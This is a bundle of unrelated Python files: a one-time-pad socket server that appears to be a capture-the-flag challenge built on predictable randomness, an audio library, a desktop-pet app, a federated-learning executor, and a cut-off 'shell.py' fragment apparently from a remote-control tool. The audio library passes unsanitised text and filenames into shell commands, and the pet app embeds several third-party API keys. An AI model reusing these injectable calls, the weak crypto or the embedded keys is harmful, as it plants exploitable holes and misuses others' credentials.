for func in [producer, consumer]:
t = Thread(target = func)
t.daemon = True
t.start()
watch_queue()
|
one-time-pad.py
|
#!/usr/bin/env python3
# vim: set fenc=utf8 ts=4 sw=4 et :
import sys
import socket
import random
from threading import Thread
with open("key.png", "rb") as f:
SECRET = f.read()
def client_thread(clientsocket):
clientsocket.send(bytes([
SECRET[i] ^ random.getrandbits(8)
for i in range(len(SECRET))
]))
clientsocket.close()
def main():
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind((socket.gethostname(), 8889))
serversocket.listen()
print('len(SECRET) = {} Bytes'.format(len(SECRET)))
sys.stdout.flush()
while True:
# accept connections on socket
(clientsocket, address) = serversocket.accept()
print('Client connected {}'.format(address))
sys.stdout.flush()
thread = Thread(target = client_thread, args = (clientsocket, ))
thread.start()
if __name__ == "__main__":
main()
|
__init__.py
|
#
# Copyright (c) 2014, Scott Silver Labs, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
This module provides interfaces to the Ready Set STEM CREATOR Kit speaker.
Additionally, it can be used for any audio out over the analog audio jack.
'''
import os
import sys
import time
import re
import io
import select
from functools import partial
from . import soundutil # c extension
import tempfile
from threading import RLock, Thread, Condition, Event
from queue import Queue, Full, Empty
from subprocess import call, check_output
from struct import pack, unpack
import socket
'''
Future Sound class member function:
def seek(self, position, absolute=False, percentage=False)
- relative +/- seconds
- absolute +/- seconds (-negative seconds from end)
- absolute percentage
- returns previous position, in seconds
'''
STOP, PLAY, FLUSH, STOPPING = range(4)
CHUNK_BYTES = 1024
SOUND_CACHE = '/home/pi/.rstem_sounds'
SOUND_DIR = '/opt/readysetstem/sounds'
MIXER_EXE_BASENAME = 'rstem_mixer'
MIXER_EXE_DIRNAME = '/opt/readysetstem/bin'
MIXER_EXE = os.path.join(MIXER_EXE_DIRNAME, MIXER_EXE_BASENAME)
SERVER_PORT = 8888
def shell_cmd(cmd):
with open(os.devnull, "w") as devnull:
call(cmd, stdout=devnull, stderr=devnull, shell=True)
def start_server():
# start server (if it is not already running)
shell_cmd('pgrep -c {} || {} &'.format(MIXER_EXE_BASENAME, MIXER_EXE))
    # Force audio to always come out of the analog audio jack. Some HDMI
    # monitors cause the audio auto-detect to route sound out over HDMI even
    # if the connected monitor has no sound (or has sound disabled).
shell_cmd('amixer cset numid=3 1')
# Wait until server is up
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for tries in range(30):
try:
sock.connect(("localhost", SERVER_PORT))
except socket.error:
pass
else:
sock.close()
break
time.sleep(0.1)
def sound_dir():
return SOUND_DIR
def master_volume(level):
if level < 0 or level > 100:
raise ValueError("level must be between 0 and 100.")
shell_cmd('amixer sset PCM {}%'.format(int(level)))
def clean_close(sock):
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
try:
sock.close()
except socket.error:
pass
class BaseSound(object):
# Default master volume
master_volume(100)
start_server()
def __init__(self):
self._SAMPLE_RATE = 44100
self._BYTES_PER_SAMPLE = 2
self._CHANNELS = 1
self._length = 0
self.gain = 1
self.internal_gain = 1
self.start_time = None
self.stop_play_mutex = RLock()
self.stopped = Event()
self.stopped.set()
# Create play msg queue, with added member function that allows a
# get_nowait() that can return empty if nothing is available.
self.play_msg = Queue()
def get_nowait_noempty():
try:
return self.play_msg.get_nowait()
except Empty:
return (None, None)
self.play_msg.get_nowait_noempty = get_nowait_noempty
self.play_count = 0
self.play_thread = Thread(target=self.__play_thread)
self.play_thread.daemon = True
self.play_thread.start()
def length(self):
'''Returns the length of the sound in seconds'''
return self._length
def is_playing(self):
'''Returns `True` if the sound is currently playing'''
return not self.stopped.is_set()
def wait(self, timeout=None):
'''Wait until the sound has finished playing.
If timeout is given (seconds), will return early (after the timeout
time) even if the sound is not finished playing.
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
self.stopped.wait(timeout)
return self
def stop(self):
'''Immediately stop the sound from playing.
Does nothing if the sound is not currently playing.
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
with self.stop_play_mutex:
self.play_msg.put((STOP, None))
self.wait()
return self
def play(self, loops=1, duration=None):
'''Starts playing the sound.
This function starts playing the sound, and returns immediately - the
sound plays in the background. To wait for the sound, use `wait()`.
Because sound functions can be chained, to create, play and wait for a
sound to complete can be done in one compound command. For example:
Sound('mysound.wav').play().wait()
`loops` is the number of times the sound should be played. `duration`
is the length of the sound to play (or `None` to play forever, or until
the sound ends).
Returns itself, so this function can be chained.
'''
assert self.play_thread.is_alive()
if duration and duration < 0:
raise ValueError("duration must be a positive number")
with self.stop_play_mutex:
self.stop()
self.end_time = time.time()
previous_play_count = self.play_count
self.play_msg.put((PLAY, (loops, duration)))
            # Wait until we know the play has started (i.e., the state ==
            # PLAY). Ugly (polled), but simple.
while previous_play_count == self.play_count:
time.sleep(0.001)
return self
def __play_thread(self):
state = STOP
while True:
if state == STOP:
msg, payload = self.play_msg.get()
if msg == PLAY:
self.stopped.clear()
self.play_count += 1
loops, duration = payload
chunk = self._chunker(loops, duration)
count = 0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", SERVER_PORT))
state = PLAY
elif state == PLAY:
msg, payload = self.play_msg.get_nowait_noempty()
if msg == STOP:
state = STOPPING
else:
try:
try:
header = pack('if', count, self.gain)
sock.send(header + next(chunk))
count += 1
except StopIteration:
header = pack('if', -1, 0)
sock.send(header)
state = FLUSH
readable, writable, exceptional = select.select([sock], [], [sock], 0)
if readable:
c = sock.recv(1)
eof = not c or ord(c)
if eof:
state = FLUSH
if exceptional:
state = FLUSH
except socket.error:
state = STOPPING
# Throttle
time.sleep(0.005)
elif state == FLUSH:
msg, payload = self.play_msg.get_nowait_noempty()
if msg == STOP:
state = STOPPING
else:
# Server will play sound to end and close socket.
eof_ack = sock.recv(1)
if not eof_ack:
state = STOPPING
# Throttle
time.sleep(0.005)
elif state == STOPPING:
clean_close(sock)
self.stopped.set()
state = STOP
def _time_to_bytes(self, duration):
if duration == None:
return None
samples = duration * self._SAMPLE_RATE
return samples * self._BYTES_PER_SAMPLE
@property
def volume(self):
'''The volume of the sound object
        Each sound object has a volume (independent of the `master_volume()`),
between 0 (muted) and 100 (loudest).
The volume is readable/writeable.
'''
return round(self.gain * self.internal_gain * 100)
@volume.setter
def volume(self, level):
if level < 0:
raise ValueError("level must be a positive number")
self.gain = (level/100)/self.internal_gain
# dummy chunking function
def _chunker(self, loops, duration):
return bytes(CHUNK_BYTES)
class Sound(BaseSound):
'''
A Sound object, that plays sounds read in from sound files.
In addition to the Sound object, this module provides some useful global
functions:
master_volume(level):
Sets the master volume (between 0 and 100)
of the audio out.
sound_dir():
Returns the sounds dir, where all sound
files are stored.
'''
def __init__(self, filename):
'''A playable sound backed by the sound file `filename` on disk.
Throws `IOError` if the sound file cannot be read.
'''
super().__init__()
self.bytes = None
if isinstance(filename, bytes):
data = filename
self.file_opener = partial(io.BytesIO, data)
byte_length = len(data)
else:
            # normalize path, relative to SOUND_DIR
try:
filename = os.path.normpath(os.path.join(SOUND_DIR, filename))
except:
raise ValueError("Filename '{}' is not valid".format(filename))
# Is it a file? Not a definitive test here, but used as a courtesy to
# give a better error when the filename is wrong.
if not os.path.isfile(filename):
raise IOError("Sound file '{}' cannot be found".format(filename))
# Create cached file
if not os.path.isdir(SOUND_CACHE):
os.makedirs(SOUND_CACHE)
_, file_ext = os.path.splitext(filename)
if file_ext != '.raw':
# Use sox to convert sound file to raw cached sound
elongated_file_name = re.sub('/', '_', filename)
raw_name = os.path.join(SOUND_CACHE, elongated_file_name)
# If cached file doesn't exist, create it using sox
if not os.path.isfile(raw_name):
soxcmd = 'sox -q {} -L -r44100 -b16 -c1 -traw {}'.format(filename, raw_name)
shell_cmd(soxcmd)
# test error
filename = raw_name
self.file_opener = partial(open, filename, 'rb')
byte_length = os.path.getsize(filename)
self._length = round(byte_length / (self._SAMPLE_RATE * self._BYTES_PER_SAMPLE), 6)
def _chunker(self, loops, duration):
with self.file_opener() as f:
duration_bytes = self._time_to_bytes(duration)
leftover = b''
for loop in reversed(range(loops)):
f.seek(0)
bytes_written = 0
while duration_bytes == None or bytes_written < duration_bytes:
if leftover:
chunk = leftover + f.read(CHUNK_BYTES - len(leftover))
leftover = b''
else:
chunk = f.read(CHUNK_BYTES)
if chunk:
if len(chunk) < CHUNK_BYTES and loop > 0:
# Save partial chunk as leftovers
leftover = chunk
break
else:
# Pad silence, if we're on the last loop and it's not a full chunk
if loop == 0:
chunk = chunk + bytes(CHUNK_BYTES)[len(chunk):]
bytes_written += CHUNK_BYTES
yield chunk
else:
# EOF
break
class Note(BaseSound):
'''A sine wave sound object. '''
def __init__(self, pitch):
'''Create a sound object that is a sine wave of the given `pitch`.
`pitch` can either be a number that is the frequency Hz (for example
440 or 256.7), or it can be a string which represents the musical note.
As a string, it should be 1 to 3 characters, of the form:
NSO
where
1. N is the note (required), from A to G
1. S is an optional semitone, either '#' (sharp) or 'b' (flat)
1. O is the optional octave, default octave is 4.
A 440Hz 'A' could be represented by any of the following:
- 440
- 'A'
- 'A4'
        For example, an ascending/descending chromatic scale on C could be
represented by:
ascending = \\
['C', 'C#', 'D', 'D#', 'E', 'F', 'F#',
'G', 'G#', 'A5', 'A#5', 'B5', 'C5']
descending = \\
['C5', 'B5', 'Bb5', 'A5', 'Ab5', 'G',
'Gb', 'F', 'E', 'Eb', 'D', 'Db', 'C']
        Also note, semitones are exact half steps, so for example 'C#' is
identical to 'Db'.
'''
super().__init__()
A4_frequency = 440
A6_frequency = A4_frequency * 2 * 2
try:
self.frequency = float(pitch)
except ValueError:
match = re.search('^([A-G])([b#]?)([0-9]?)$', pitch)
if not match:
raise ValueError("pitch parameter must be a frequency or note (e.g. 'A', 'B#', or 'Cb4')")
note, semitone, octave = match.groups()
if not semitone:
semitone_adjust = 0
elif semitone == 'b':
semitone_adjust = -1
else:
semitone_adjust = 1
if not octave:
octave = 4
octave = int(octave)
half_step_map = {'C' : 0, 'D' : 2, 'E' : 4, 'F' : 5, 'G' : 7, 'A' : 9, 'B' : 11}
half_steps = octave * 12 + half_step_map[note]
half_steps += semitone_adjust
# Adjust half steps relative to A4 440Hz
half_steps -= 4 * 12 + 9
self.frequency = 2 ** (half_steps / 12.0) * A4_frequency
# Simple bass boost: scale up the volume of lower frequency notes. For
        # each octave below 'A6', double the volume.
if self.frequency < A6_frequency:
self.internal_gain = A6_frequency / self.frequency
def play(self, duration=1):
'''Starts playing the Note.
This function starts playing the sound, and returns immediately - the
sound plays in the background. To wait for the sound, use `wait()`.
Because sound functions can be chained, to create, play and wait for a
sound to complete can be done in one compound command. For example:
Note('A').play().wait()
Returns itself, so this function can be chained.
'''
super().play(duration=duration)
return self
def _chunker(self, loops, duration):
if duration == None:
chunks = 999999999
else:
chunks = int((self._time_to_bytes(duration) * loops) / CHUNK_BYTES)
for chunk in range(chunks):
yield soundutil.note(chunk, float(self.frequency))
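# Worked example of the pitch math in Note.__init__ above (values rounded):
# 'C5' gives half_steps = 5*12 + 0 = 60, then 60 - (4*12 + 9) = 3 half steps
# above A4, so frequency = 2 ** (3 / 12.0) * 440 ~= 523.25 Hz; with the default
# octave, plain 'C' works out to 261.63 Hz (middle C).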
class Speech(Sound):
'''A text-to-speech sound object.'''
def __init__(self, text, espeak_options=''):
'''Create a sound object that is text-to-speech of the given `text`.
The sound is created using the espeak engine (an external program).
Command line options to espeak can be added using `espeak_options`.
'''
wav_fd, wav_name = tempfile.mkstemp(suffix='.wav')
os.system('espeak {} -w {} "{}"'.format(espeak_options, wav_name, text))
os.close(wav_fd)
self.wav_name = wav_name
super().__init__(wav_name)
def __del__(self):
os.remove(self.wav_name)
__all__ = ['Sound', 'Note', 'Speech', 'master_volume', 'sound_dir']
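# A minimal usage sketch of the classes above (illustrative): the wav filename
# is an assumption and must exist under sound_dir() or be an absolute path;
# Speech additionally requires the external 'espeak' program and the mixer
# server started at import time.
if __name__ == '__main__':
    master_volume(75)                        # overall output level, 0-100
    Note('A4').play(duration=0.5).wait()     # 440 Hz sine wave for half a second
    Speech('ready set go').play().wait()     # text-to-speech via espeak
    Sound('train.wav').play(loops=2).wait()  # file from sound_dir(), looped twice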
|
desktoppet.py
|
'''
Function:
    Desktop pet
Author:
Charles
WeChat official account:
Charles的皮卡丘
'''
import os
import sys
import time
import random
import requests
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import QtWidgets, QtGui
'''Configuration'''
class Config():
ROOT_DIR = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'resources')
ACTION_DISTRIBUTION = [
['1', '2', '3'],
['4', '5', '6', '7', '8', '9', '10', '11'],
['12', '13', '14'],
['15', '16', '17'],
['18', '19'],
['20', '21'],
['22'],
['23', '24', '25'],
['26', '27', '28', '29'],
['30', '31', '32', '33'],
['34', '35', '36', '37'],
['38', '39', '40', '41'],
['42', '43', '44', '45', '46']
]
PET_ACTIONS_MAP = dict()
for name in ['pikachu', 'blackcat', 'whitecat', 'fox']:
PET_ACTIONS_MAP[name] = ACTION_DISTRIBUTION
PET_ACTIONS_MAP['bingdwendwen'] = [
[str(i) for i in range(1, 41, 8)],
[str(i) for i in range(41, 56)],
[str(i) for i in range(56, 91)],
]
BAIDU_KEYS = random.choice([
['25419425', 'fct6UMiQMLsp53MqXzp7AbKQ', 'p3wU9nPnfR7iBz2kM25sikN2ms0y84T3'],
['24941009', '2c5AnnNaQKOIcTrLDTuY41vv', 'HOYo7BunbFtt88Z0ALFZcFSQ4ZVyIgiZ'],
['11403041', 'swB03t9EbokK03htGsg0PKYe', 'XX20l47se2tSGmet8NihkHQLIjTIHUyy'],
])
'''Speech recognition module'''
class SpeechRecognition():
def __init__(self, app_id, api_key, secret_key, **kwargs):
from aip import AipSpeech
self.aipspeech_api = AipSpeech(app_id, api_key, secret_key)
self.speech_path = kwargs.get('speech_path', 'recording.wav')
assert self.speech_path.endswith('.wav'), 'only support audio with wav format'
    '''Record audio from the microphone'''
def record(self, sample_rate=16000):
import speech_recognition as sr
rec = sr.Recognizer()
with sr.Microphone(sample_rate=sample_rate) as source:
audio = rec.listen(source)
with open(self.speech_path, 'wb') as fp:
fp.write(audio.get_wav_data())
    '''Recognize the recorded speech'''
def recognition(self):
try:
assert os.path.exists(self.speech_path)
with open(self.speech_path, 'rb') as fp:
content = fp.read()
result = self.aipspeech_api.asr(content, 'wav', 16000, {'dev_pid': 1536})
text = result['result'][0]
return text
except:
return None
    '''Synthesize speech and play it'''
def synthesisspeak(self, text=None, audiopath=None):
assert text is None or audiopath is None
import pygame
if audiopath is None:
audiopath = f'recording_{time.time()}.mp3'
result = self.aipspeech_api.synthesis(
text, 'zh', 1,
{'spd': 4, 'vol': 5, 'per': 4}
)
if not isinstance(result, dict):
with open(audiopath, 'wb') as fp:
fp.write(result)
pygame.mixer.init()
pygame.mixer.music.load(audiopath)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
time.sleep(0.5)
else:
pygame.mixer.init()
pygame.mixer.music.load(audiopath)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
time.sleep(0.5)
'''Desktop pet'''
class DesktopPet(QWidget):
tool_name = '桌面宠物'
def __init__(self, pet_type='pikachu', parent=None, **kwargs):
super(DesktopPet, self).__init__(parent)
self.pet_type = pet_type
self.cfg = Config()
for key, value in kwargs.items():
if hasattr(self.cfg, key): setattr(self.cfg, key, value)
app_id, api_key, secret_key = self.cfg.BAIDU_KEYS
self.speech_api = SpeechRecognition(app_id, api_key, secret_key)
        # Initialization
self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)
self.setAutoFillBackground(False)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.repaint()
        # Load the pet images
if pet_type not in self.cfg.PET_ACTIONS_MAP: pet_type = None
if pet_type is None:
self.pet_images, iconpath = self.randomLoadPetImages()
else:
for name in list(self.cfg.PET_ACTIONS_MAP.keys()):
if name != pet_type: self.cfg.PET_ACTIONS_MAP.pop(name)
self.pet_images, iconpath = self.randomLoadPetImages()
        # Set up the quit option
quit_action = QAction('退出', self, triggered=self.quit)
quit_action.setIcon(QIcon(iconpath))
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setIcon(QIcon(iconpath))
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.show()
        # Currently displayed image
self.image = QLabel(self)
self.setImage(self.pet_images[0][0])
        # Whether the pet follows the mouse
self.is_follow_mouse = False
        # Avoid the pet jumping to the top-left corner when dragged
self.mouse_drag_pos = self.pos()
        # Show the pet
self.resize(self.pet_images[0][0].size().width(), self.pet_images[0][0].size().height())
self.randomPosition()
self.show()
        # Variables needed to run the pet's animation actions
self.is_running_action = False
self.action_images = []
self.action_pointer = 0
self.action_max_len = 0
        # Perform an action at regular intervals
self.timer_act = QTimer()
self.timer_act.timeout.connect(self.randomAct)
self.timer_act.start(500)
        # Check for speech input at regular intervals
self.timer_speech = QTimer()
self.timer_speech.timeout.connect(self.talk)
self.timer_speech.start(2000)
self.running_talk = False
    '''Conversation feature'''
def talk(self):
if self.running_talk: return
self.running_talk = True
def _talk(self):
valid_names = {'pikachu': '皮卡丘', 'blackcat': '黑猫', 'whitecat': '白猫', 'fox': '狐狸', 'bingdwendwen': '冰墩墩'}
while True:
self.speech_api.record()
user_input = self.speech_api.recognition()
if user_input is None: return
if valid_names[self.pet_type] in user_input: break
else: return
self.speech_api.synthesisspeak('你好呀, 主人')
while True:
self.speech_api.record()
user_input = self.speech_api.recognition()
if user_input is None: continue
if '再见' in user_input:
self.speech_api.synthesisspeak('好的, 主人再见')
self.running_talk = False
break
else:
reply = self.turing(user_input)
self.speech_api.synthesisspeak(reply)
threading.Thread(target=lambda: _talk(self)).start()
    '''Turing chatbot API'''
def turing(self, inputs):
appkeys = [
'f0a5ab746c7d41c48a733cabff23fb6d', 'c4fae3a2f8394b73bcffdecbbb4c6ac6', '0ca694db371745668c28c6cb0a755587',
'7855ce1ebd654f31938505bb990616d4', '5945954988d24ed393f465aae9be71b9', '1a337b641da04c64aa7fd4849a5f713e',
'eb720a8970964f3f855d863d24406576', '1107d5601866433dba9599fac1bc0083', '70a315f07d324b3ea02cf21d13796605',
'45fa933f47bb45fb8e7746759ba9b24a', '2f1446eb0321804291b0a1e217c25bb5', '7f05e31d381143d9948109e75484d9d0',
'35ff2856b55e4a7f9eeb86e3437e23fe', '820c4a6ca4694063ab6002be1d1c63d3',
]
while True:
url = 'http://www.tuling123.com/openapi/api?key=%s&info=%s'
response = requests.get(url % (random.choice(appkeys), inputs))
reply = response.json()['text']
if u'当天请求次数已用完' in reply: continue
return reply
    '''Perform a random action'''
def randomAct(self):
if not self.is_running_action:
self.is_running_action = True
self.action_images = random.choice(self.pet_images)
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.runFrame()
    '''Run one frame of the current action'''
def runFrame(self):
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.setImage(self.action_images[self.action_pointer])
self.action_pointer += 1
    '''Set the currently displayed image'''
def setImage(self, image):
self.image.setPixmap(QPixmap.fromImage(image))
    '''Randomly load all images for one desktop pet'''
def randomLoadPetImages(self):
cfg = self.cfg
pet_name = random.choice(list(cfg.PET_ACTIONS_MAP.keys()))
actions = cfg.PET_ACTIONS_MAP[pet_name]
pet_images = []
for action in actions:
pet_images.append([self.loadImage(os.path.join(cfg.ROOT_DIR, pet_name, 'shime'+item+'.png')) for item in action])
iconpath = os.path.join(cfg.ROOT_DIR, pet_name, 'shime1.png')
return pet_images, iconpath
    '''When the left mouse button is pressed, bind the pet to the mouse position'''
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.is_follow_mouse = True
self.mouse_drag_pos = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
    '''When the mouse moves, the pet moves with it'''
def mouseMoveEvent(self, event):
if Qt.LeftButton and self.is_follow_mouse:
self.move(event.globalPos() - self.mouse_drag_pos)
event.accept()
    '''Unbind when the mouse button is released'''
def mouseReleaseEvent(self, event):
self.is_follow_mouse = False
self.setCursor(QCursor(Qt.ArrowCursor))
    '''Load an image'''
def loadImage(self, imagepath):
image = QImage()
image.load(imagepath)
return image
    '''Move to a random position on the screen'''
def randomPosition(self):
screen_geo = QDesktopWidget().screenGeometry()
pet_geo = self.geometry()
width = (screen_geo.width() - pet_geo.width()) * random.random()
height = (screen_geo.height() - pet_geo.height()) * random.random()
        self.move(int(width), int(height))
    '''Quit the program'''
def quit(self):
self.close()
sys.exit()
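'''Minimal launch sketch (illustrative): requires a desktop Qt session, the
resources/ image folders from the original project, and the speech/audio
dependencies (baidu-aip, speech_recognition, pygame) imported at runtime'''
if __name__ == '__main__':
    app = QApplication(sys.argv)
    pet = DesktopPet(pet_type='pikachu')
    sys.exit(app.exec_())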
|
remote_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import logging
import queue
import threading
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import executor_base
from tensorflow_federated.python.core.impl import executor_service_utils
from tensorflow_federated.python.core.impl import executor_value_base
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
@property
def type_signature(self):
return self._type_signature
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
self._thread_pool_executor = thread_pool_executor
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('request_iter: waiting for request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug('request_iter: got request of type %s',
val[0].WhichOneof('request'))
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug('request_iter: got None request')
# None means we are done processing
return
response_iter = stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('response_thread_fn: waiting for response')
for response in response_iter:
logging.debug('response_thread_fn: got response of type %s',
response.WhichOneof('response'))
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
async def send_request(self, request):
"""Send a request on the bidi stream."""
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance.
NOTE: This component is only available in Python 3.
"""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
if rpc_mode == 'STREAMING':
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def __del__(self):
if self._bidi_stream:
self._bidi_stream.close()
del self._bidi_stream
async def create_value(self, value, type_spec=None):
value_proto, type_spec = (
executor_service_utils.serialize_value(value, type_spec))
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if not self._bidi_stream:
response = self._stub.CreateValue(create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if not self._bidi_stream:
response = self._stub.CreateCall(create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
async def create_tuple(self, elements):
elem = anonymous_tuple.to_elements(anonymous_tuple.from_container(elements))
proto_elem = []
type_elem = []
for k, v in elem:
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateTupleRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.NamedTupleType(type_elem)
request = executor_pb2.CreateTupleRequest(element=proto_elem)
if not self._bidi_stream:
response = self._stub.CreateTuple(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_tuple=request))).create_tuple
py_typecheck.check_type(response, executor_pb2.CreateTupleResponse)
return RemoteValue(response.value_ref, result_type, self)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature,
computation_types.NamedTupleType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if not self._bidi_stream:
response = self._stub.CreateSelection(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if not self._bidi_stream:
response = self._stub.Compute(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
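# A usage sketch (illustrative, not part of this module): connecting to an
# executor service. The address/port, the 'import tensorflow as tf' dependency
# and the example value are assumptions.
#
#   channel = grpc.insecure_channel('localhost:10000')
#   executor = RemoteExecutor(channel, rpc_mode='STREAMING')
#   loop = asyncio.get_event_loop()
#   ten = loop.run_until_complete(executor.create_value(10, tf.int32))
#   print(loop.run_until_complete(ten.compute()))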
|
shell.py
|
# Date: 06/05/2018
# Author: Pure-L0G1C
# Description: Recv/Send to master
import sys
import time
from queue import Queue
from threading import Thread, RLock
class Shell(object):
def __init__(self, sess_obj, interface):
self.interface = interface
self.sess = sess_obj
self.is_alive = True
self.recv = Queue()
self.lock = RLock()
def start(self):
t1 = Thread(target=self.listen)
t2 = Thread(target=self.recv_manager)
